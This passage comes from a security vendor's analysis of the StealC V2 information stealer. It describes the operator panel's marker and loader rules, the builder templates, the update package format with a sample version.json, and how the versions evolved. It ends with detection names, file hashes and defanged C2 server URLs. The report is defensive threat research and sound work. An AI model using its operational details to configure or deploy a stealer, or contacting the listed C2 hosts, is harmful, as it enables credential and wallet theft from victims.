For example, the threat actor could create a marker searching for strings containing coinbase.com in the contents of the exfiltrated password and cookies files as shown below. Figure 3: StealC V2 Marker rule which will search for coinbase.com.Then the actor can then create a loader rule that will be triggered when the marker matches. So if the victim’s files contain the marker’s search terms, the C2 will answer to the loader request with the triggered loader’s URL as shown in the figure below.Figure 4: StealC V2 loader rule creation which will trigger when the Coinbase Marker matches.These custom configurations are automatically merged with a build template file, which is a pre-configured StealC V2 binary.The builder only modifies the build parameter from the build template, leaving the build_id parameter in plaintext and set to the default value across all templates. Important elements such as the RC4 key, C2 address, and URL path are exclusively managed by the StealC V2 development team. Note that StealC V2 currently only supports HTTP communication on port 80.UpdatesThe figure below shows the update interface in StealC V2’s control panel.Figure 5: StealC V2’s panel and builder update menu (with two updates applied).After the StealC V2 control panel is set up, the installer script instructs the operator to contact support (the StealC seller) and send the control panel domain, the path for network communication, and the RC4 key created at install time. After receiving these parameters, the seller creates an update containing a builder template binary configured with the parameters from the installation script. 
Once the operator receives the builder template, they can use the control panel to create new StealC builds.

The update file is packaged as a ZIP archive containing the following components:
- version.json: JSON file used by the panel to identify and install the update.
- build.exe: StealC V2 template binary.
- Optional patch files: Additional files that replace specific existing files in the panel during the update process, delivering new functionality or fixes.

The example below shows the contents of a version.json file. This file contains the update information that the panel reads to identify and apply the changes included in the update.

{
  "version": "2.2.4",
  "admin_update": true,
  "gate_update": true,
  "db_update": false,
  "changes":
  [
    {"type": "gate", "description": "Fix build block requests v2"}
  ]
}

The table below describes the fields inside the version.json file:
- version: The StealC V2 bot version.
- admin_update: A flag that instructs the updater to apply patches to the admin structure folder.
- gate_update: A flag that instructs the updater to apply patches to the gate structure folder.
- changes: A list of update messages detailing the modifications, displayed within the panel.
- db_update: Indicates updates or modifications to the panel's database model (MySQL).

Table 4: Parameters present in StealC V2's update configuration file.

Comparing StealC builds

After examining the builder templates included in the C2 panel, we compared different versions and identified key improvements in their development. The table below highlights the evolution of StealC across versions:

Template version 2.0.1 (update file: update.stealc_update)
- No obfuscation; all strings are stored in plaintext.
- Only a subset of API functions is resolved.
- No RC4 keys.
- Uses winhttp.dll APIs for communication.
- Configuration parameters are hardcoded.

Template version 2.0.1 (update file: 2.0.0.stealc_update)
- Implemented obfuscation.
- Added an RC4 key to decrypt the malware's strings.
- All API functions are resolved at runtime.
- Features a distinct code structure that sets it apart from other versions.
- Encrypts configuration parameters using RC4.

Template version 2.1.1 (update file: 2.1.1.stealc_update)
- Features a code structure similar to more recent samples.
- First version using encryption/decryption routines for network communication, with a single RC4 key that is also used for decrypting the malware's strings.

Template version 2.1.3 (update file: 2.1.2.stealc_update)
- Identical to version 2.1.1.

Template version 2.2.4 (update file: 2.0.1.stealc_update)
- Includes one RC4 key for string decryption and a separate RC4 key for network encryption.
- Improved payload download (based on winhttp instead of wininet.dll).
- Added an autodelete command.

Table 5: Differences among the StealC V2 bot templates present in several update files.

Additionally, the latest version includes a self-delete routine, triggered by the configuration flag (self_delete) received from the C2 server, which is very similar to the routine that StealC V1 used to erase the downloaded DLLs.

Conclusion

StealC V2 introduces improvements such as enhanced payload delivery, a streamlined communication protocol with encryption, and a redesigned control panel that enables more targeted information collection. StealC V2 is frequently used in conjunction with other malware families such as Amadey. ThreatLabz is continuing to track updates to StealC V2 and adding coverage to protect our customers.

Zscaler Coverage

Zscaler's multilayered cloud security platform detects indicators related to the new variant of StealC V2 at various levels.
The figure below depicts the Zscaler Cloud Sandbox, showing detection details for StealC V2.

Figure 6: Zscaler sandbox report for StealC V2.

In addition to sandbox detections, Zscaler's multilayered cloud security platform detects indicators related to StealC at various levels with the following threat names:
- Win64.PWS.Stealc
- Win32.PWS.Stealc
- Win64.PWS.Amadey
- Win32.PWS.Amadey

Indicators Of Compromise (IOCs)

SHA256 hashes:
- 0b921636568ee3e1f8ce71ff9c931da5675089ba796b65a6b212440425d63c8c: Packed sample (with Themida), StealC V2
- e205646761f59f23d5c8a8483f8a03a313d3b435b302d3a37061840b5cc084c3: Packed sample (with Themida), StealC V2
- a1b2aecdd1b37e0c7836f5c254398250363ea74013700d9a812c98269752f385: Unpacked sample, StealC V2
- 27c77167584ce803317eab2eb5db5963e9dfa86450237195f5723185361510dc: Unpacked sample, StealC V2
- dd36c7d50cb05761391a7f65932193ec847d34f8ba1bb2f2a43ecf4985d911f4: Dropped payload, Amadey
- 87618787e1032bbf6a6ca8b3388ea3803be20a49e4afaba1df38a6116085062f: Malware dropping StealC V2, Amadey

StealC V2 C2 servers:
- http://45.93.20[.]64/c090b39aa5004512.php
- http://45.93.20[.]28/3d15e67552d448ff.php
- http://88.214.48[.]93/ea2cb15d61cc476f.php